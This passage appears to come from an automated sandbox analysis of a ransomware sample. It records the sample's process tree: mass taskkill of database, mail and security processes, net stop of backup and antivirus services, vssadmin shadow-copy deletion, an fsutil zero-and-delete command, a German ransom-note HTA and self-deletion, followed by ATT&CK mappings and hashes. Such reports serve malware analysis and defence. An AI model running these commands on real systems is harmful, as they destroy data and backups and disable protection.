  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5816
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5824
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5680
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5672
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5832
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5840
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5920
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5908
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5936
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5892
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM nslsvice.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5960
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM nservice.exe /f
  2⤵
  - Kills process with taskkill
  PID:5968
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ntrtscan.exe /f
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5976
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5952
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wrsa.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:6020
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM jetty.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:6012
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM hMailServer.exe /f
  2⤵
  - Kills process with taskkill
  PID:6004
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thunderbird.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4068
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /f
  2⤵
  PID:6140
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM store.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:6132
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4716
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4664
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /f
  2⤵
  - Kills process with taskkill
  PID:4260
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /f
  2⤵
  - Kills process with taskkill
  PID:1476
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1968
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /f
  2⤵
  PID:756
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /f
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:852
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /f
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5284
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1588
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5168
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5492
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /f
  2⤵
  - Kills process with taskkill
  PID:5216
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /f
  2⤵
  - Kills process with taskkill
  PID:5812
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /f
  2⤵
  - Kills process with taskkill
  PID:6152
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /f
  2⤵
  - Kills process with taskkill
  PID:5768
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /f
  2⤵
  PID:6188
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /f
  2⤵
  PID:6180
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  PID:6172
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:6252
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:6244
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /f
  2⤵
  PID:6236
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:6228
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /f
  2⤵
  - Kills process with taskkill
  PID:6220
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /f
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5136
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /f
  2⤵
  - Kills process with taskkill
  PID:2432
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2272
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /f
  2⤵
  - Kills process with taskkill
  PID:1424
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6276
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6332
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6308
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6348
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6340
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6432
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6448
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6440
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6420
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:6480
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6472
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6464
- C:\Windows\SysWOW64\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:6456
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\DATEIEN_VERSCHLUESSELT.hta
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2988
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:2620
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:3076
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:3620
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
  2⤵
  - Deletes itself
  PID:2356
- - C:\Windows\SysWOW64\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:2808

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
1⤵
PID:1744

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
1⤵
PID:968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
1⤵
PID:1728

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
1⤵
PID:1208

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
1⤵
PID:520

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:284

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:572

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-19126457181148524348-1594792959-582744845328830082-1475068836953051101036393216"
1⤵
PID:1588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:1556

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
- Suspicious use of WriteProcessMemory
PID:2044

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
1⤵
PID:316

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-67640242459998707-1535764259-18652030811673859224-37703281301360618-1304069826"
1⤵
PID:568

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "189600495536273989526821128-4265741991943365310-2105612828-461481550145792428"
1⤵
PID:1240

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1458488059-1003021961-201279871218186833451261086000-17745072821677254261-783309353"
1⤵
PID:1560

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-60885745974629839-13473519481451452308690134301232179388-1659186480-251923900"
1⤵
PID:1584
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop CAARCUpdateSvc /y
  2⤵
  PID:2372

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
1⤵
PID:1312

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
1⤵
PID:1744

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "462754450-970805412576968255195423541512327991421853897634-745280954-515955642"
1⤵
- Suspicious use of WriteProcessMemory
PID:316

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-902254769-765661912-1964059176-1148309529-40442169619880579591933914751-899319025"
1⤵
PID:572

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-7935202611185007927-788308654-1002550108-11517883391679303428-750377662-1372916866"
1⤵
PID:2448

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1615759311225153871140690114-1371427567-21016839051131092647155540145-79649810"
1⤵
PID:5140

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-619423857-1837403994-69069552695145340-141427581217289155-525222376881927400"
1⤵
PID:2288

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1558872437807368417-1874681874402780405-1530124807290053147-105482896552800159"
1⤵
PID:5148

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-455776132-156759130013671324691316286275-5889639801543495419-10117692601713257796"
1⤵
PID:4812

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\DATEIEN_VERSCHLUESSELT.hta

MD5
69938450d8a041f27f75a180c0553a95

SHA1
03ce1ada80698fe3129e9cfa98cd81c32ea5bbe3

SHA256
e00c5cb57785aac5f6492a04371edca79dc601323451dfed2c00b5766250dedf

SHA512
ec36506a58aa08907c133ae20eacdd7b46c16a375512631b208c9639c15db1691d4b86d25ea731b9027767230769eddcae2a65373b16dc248a66acda5a3688ac

Download Submit
memory/284-111-0x0000000000000000-mapping.dmp

Download
memory/292-83-0x0000000000000000-mapping.dmp

Download
memory/316-105-0x0000000000000000-mapping.dmp

Download
memory/316-72-0x0000000000000000-mapping.dmp

Download
memory/320-79-0x0000000000000000-mapping.dmp

Download
memory/404-82-0x0000000000000000-mapping.dmp

Download
memory/480-78-0x0000000000000000-mapping.dmp

Download
memory/520-103-0x0000000000000000-mapping.dmp

Download
memory/520-77-0x0000000000000000-mapping.dmp

Download
memory/560-119-0x0000000000000000-mapping.dmp

Download
memory/568-104-0x0000000000000000-mapping.dmp

Download
memory/572-115-0x0000000000000000-mapping.dmp

Download
memory/652-114-0x0000000000000000-mapping.dmp

Download
memory/772-80-0x0000000000000000-mapping.dmp

Download
memory/816-93-0x0000000000000000-mapping.dmp

Download
memory/844-81-0x0000000000000000-mapping.dmp

Download
memory/876-110-0x0000000000000000-mapping.dmp

Download
memory/904-87-0x0000000000000000-mapping.dmp

Download
memory/968-86-0x0000000000000000-mapping.dmp

Download
memory/968-117-0x0000000000000000-mapping.dmp

Download
memory/1052-84-0x0000000000000000-mapping.dmp

Download
memory/1084-92-0x0000000000000000-mapping.dmp

Download
memory/1088-63-0x0000000004A50000-0x0000000004A51000-memory.dmp

Filesize
4KB

Download
memory/1088-60-0x0000000000180000-0x0000000000181000-memory.dmp

Filesize
4KB

Download
memory/1156-124-0x0000000000000000-mapping.dmp

Download
memory/1164-64-0x0000000000000000-mapping.dmp

Download
memory/1200-95-0x0000000000000000-mapping.dmp

Download
memory/1204-107-0x0000000000000000-mapping.dmp

Download
memory/1208-89-0x0000000000000000-mapping.dmp

Download
memory/1240-100-0x0000000000000000-mapping.dmp

Download
memory/1312-85-0x0000000000000000-mapping.dmp

Download
memory/1352-67-0x0000000000000000-mapping.dmp

Download
memory/1352-112-0x0000000000000000-mapping.dmp

Download
memory/1428-109-0x0000000000000000-mapping.dmp

Download
memory/1480-73-0x0000000000000000-mapping.dmp

Download
memory/1520-116-0x0000000000000000-mapping.dmp

Download
memory/1532-76-0x0000000000000000-mapping.dmp

Download
memory/1536-102-0x0000000000000000-mapping.dmp

Download
memory/1540-75-0x0000000000000000-mapping.dmp

Download
memory/1548-120-0x0000000000000000-mapping.dmp

Download
memory/1556-108-0x0000000000000000-mapping.dmp

Download
memory/1560-113-0x0000000000000000-mapping.dmp

Download
memory/1576-99-0x0000000000000000-mapping.dmp

Download
memory/1584-123-0x0000000000000000-mapping.dmp

Download
memory/1588-90-0x0000000000000000-mapping.dmp

Download
memory/1616-126-0x0000000000000000-mapping.dmp

Download
memory/1652-74-0x0000000000000000-mapping.dmp

Download
memory/1700-88-0x0000000000000000-mapping.dmp

Download
memory/1712-96-0x0000000000000000-mapping.dmp

Download
memory/1728-91-0x0000000000000000-mapping.dmp

Download
memory/1744-101-0x0000000000000000-mapping.dmp

Download
memory/1744-70-0x0000000000000000-mapping.dmp

Download
memory/1752-68-0x0000000000000000-mapping.dmp

Download
memory/1760-98-0x0000000000000000-mapping.dmp

Download
memory/1768-69-0x0000000000000000-mapping.dmp

Download
memory/1772-121-0x0000000000000000-mapping.dmp

Download
memory/1784-125-0x0000000000000000-mapping.dmp

Download
memory/1788-71-0x0000000000000000-mapping.dmp

Download
memory/1928-118-0x0000000000000000-mapping.dmp

Download
memory/1960-65-0x0000000000000000-mapping.dmp

Download
memory/1960-122-0x0000000000000000-mapping.dmp

Download
memory/1964-66-0x0000000000000000-mapping.dmp

Download
memory/2024-94-0x0000000000000000-mapping.dmp

Download
memory/2036-97-0x0000000000000000-mapping.dmp

Download
memory/2044-106-0x0000000000000000-mapping.dmp

Download
memory/2044-62-0x0000000000000000-mapping.dmp

Download
memory/2988-127-0x0000000075281000-0x0000000075283000-memory.dmp

Filesize
8KB

Download